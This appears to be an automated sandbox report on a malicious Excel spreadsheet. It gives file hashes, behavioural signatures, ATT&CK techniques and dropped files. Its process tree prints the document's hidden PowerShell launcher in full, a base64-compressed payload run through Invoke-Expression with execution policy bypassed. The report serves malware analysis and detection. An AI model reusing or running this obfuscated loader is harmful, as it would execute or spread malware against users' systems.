Analysis

  • max time kernel
    36s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    19-04-2024 01:02

General

  • Target

    e4b272b64e21ab3f62479372b7466e68f81114e5b3e7b7479b7a0472580a2e68.xls

  • Size

    43KB

  • MD5

    d9464ee377d39336b2d7e67d5ea1817f

  • SHA1

    2b1fa3902f353209be180191dee90a984e1ba0a9

  • SHA256

    e4b272b64e21ab3f62479372b7466e68f81114e5b3e7b7479b7a0472580a2e68

  • SHA512

    a261e2a9fc7ab0f5fe905621a6fa0f3a94179fa4e8cd40d24396e2d25f519f701e48c5d3c0773413e6e07cb8fa06f0cfe7524d218b3d1469f55cc1adbf881a27

  • SSDEEP

    768:mzmB+k3hOdsylKlgryzc4bNhZFGzE+cL2knAJgRX42AAbXwrlIRbxCca8yfMy:+k3hOdsylKlgryzc4bNhZFGzE+cL2kno

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\e4b272b64e21ab3f62479372b7466e68f81114e5b3e7b7479b7a0472580a2e68.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2356
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVRRb9pIEH7nV4ysPclWsHGApg1WpKakaXNXUi6kSe8QOi32gLesd531OphQ/vuNiY+kr/fi9Yxn5/tm5huzBziD905reiHlVZZrY11nhUah7HWDRErHm0FezqWIobDc0oGVpe9wpezYGrgTxpZcnkupY7fxyfw8SQwWRRtKoSwk64l4wsZYPMdSKq1uN/mLe2y0xdh60f/mMjTILd6mdCQvXJ7tc2uNmJcWX5GyPF49MzsEk8/YA/uDe8wNz5CwDpf3WFTCpeTL15HPaFcJleG8b1mz2bKEOuycfxhefLz89Pnq9z++jK6/jv+8mdx+u7v//tfffB4nuFim4sdKZkrnD6aw5eO62jyFx91e/83J23enTnCrhyk358bwjeu1FqWKa3SIXfbobcGgLakPrjsldtPZDNjjrzfgJ4yQF6VB/+v8B7UZ/EmZeQE94DcIq+MwBB8f4LTr7V6yW9iyRc3eiY6DoPdzoam4OPX1PgV9OzoDlkzdJVrfcJXoDPyMVyKjrCwJvqBa2tSb7aKGH1tEr7IjbCE3OqZWw3bKa6IzVhEcPY6A/bOLAFVCFCpiX5AaGlzYugrX/xk3e1wvUKQF19vtXgEst0CMwWXiLIyYAF9aOOnT29GRt2UpIdmIrWrAhBAwAmgKpCsSBPFdUVxRB6Q1IxmBWIBLPS88Dw5dpwiCbQzn9PH7N4fKnF6jDSZoHkWMY01jGXHFl2hmg0HtRTNEY8VC0CbgHZci2ctpyKWckywJc8usKXEXsYyMayq4GdxkU1jMgjr9Pc6HUqCyUYtlwWcSHpoiIPm6Tlmg8QlPWacNzkg/CSl5px+ExF9nOYHNJVU8mlx9hJPgOIJ7QX1cF3B96zlexBSBLiOYfthY3Asqr9uQBRd6raTmyQW33HVSa/Ni0OkUlhoXxFKXSSW5WdK7zgb9fq/TibsdphzwWkxTBuLm11tPOsFsjuYCF0KJ/bTYA/jXtGXgEJVe1wFfkVXkPEbYey6buRbg57wobGrKFqvOmB4MfvkLhW2WN9prh1UvDEM6+qEXTZvW3ZTKigwDWlo0Om+GVAQjboqUS5rQUOcbl+VtCNswfd7tmcsq2ikyel3X89pwAKlLoyuvfz6E2GZVuz7Cevd0aX1VShLQ/gfjTyRiTiuIsSaFvzvph+GOhBCn292/ \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2644

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize

    68KB

    MD5

    29f65ba8e88c063813cc50a4ea544e93

    SHA1

    05a7040d5c127e68c25d81cc51271ffb8bef3568

    SHA256

    1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

    SHA512

    e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    ea22f406321c4d35735071545006853b

    SHA1

    1e3ca24d5b5a0d9af59b94fc751877f3dd0b1909

    SHA256

    3341e760205228c3b072baed91655f0f41cb0cae6d152e5892632bcd8e4bfb1f

    SHA512

    1d3ecd5fa2232cb4dc9b5e77b2289a25cd0b556c608d1c7eca91f531eb11925317fa13464be5ba43ad5b5c6674fc33e89e1d62dad3f88b66c553e15b50676d9b

  • C:\Users\Admin\AppData\Local\Temp\Tar7843.tmp
    Filesize

    177KB

    MD5

    435a9ac180383f9fa094131b173a2f7b

    SHA1

    76944ea657a9db94f9a4bef38f88c46ed4166983

    SHA256

    67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

    SHA512

    1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

  • memory/2356-4-0x0000000000510000-0x0000000000610000-memory.dmp
    Filesize

    1024KB

  • memory/2356-3-0x0000000000510000-0x0000000000610000-memory.dmp
    Filesize

    1024KB

  • memory/2356-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/2356-2-0x0000000000510000-0x0000000000610000-memory.dmp
    Filesize

    1024KB

  • memory/2356-1-0x0000000071EBD000-0x0000000071EC8000-memory.dmp
    Filesize

    44KB

  • memory/2356-133-0x0000000071EBD000-0x0000000071EC8000-memory.dmp
    Filesize

    44KB

  • memory/2356-134-0x0000000000510000-0x0000000000610000-memory.dmp
    Filesize

    1024KB

  • memory/2644-7-0x000000006BAC0000-0x000000006C06B000-memory.dmp
    Filesize

    5.7MB

  • memory/2644-8-0x000000006BAC0000-0x000000006C06B000-memory.dmp
    Filesize

    5.7MB

  • memory/2644-9-0x0000000002580000-0x00000000025C0000-memory.dmp
    Filesize

    256KB

  • memory/2644-10-0x0000000002580000-0x00000000025C0000-memory.dmp
    Filesize

    256KB

  • memory/2644-132-0x000000006BAC0000-0x000000006C06B000-memory.dmp
    Filesize

    5.7MB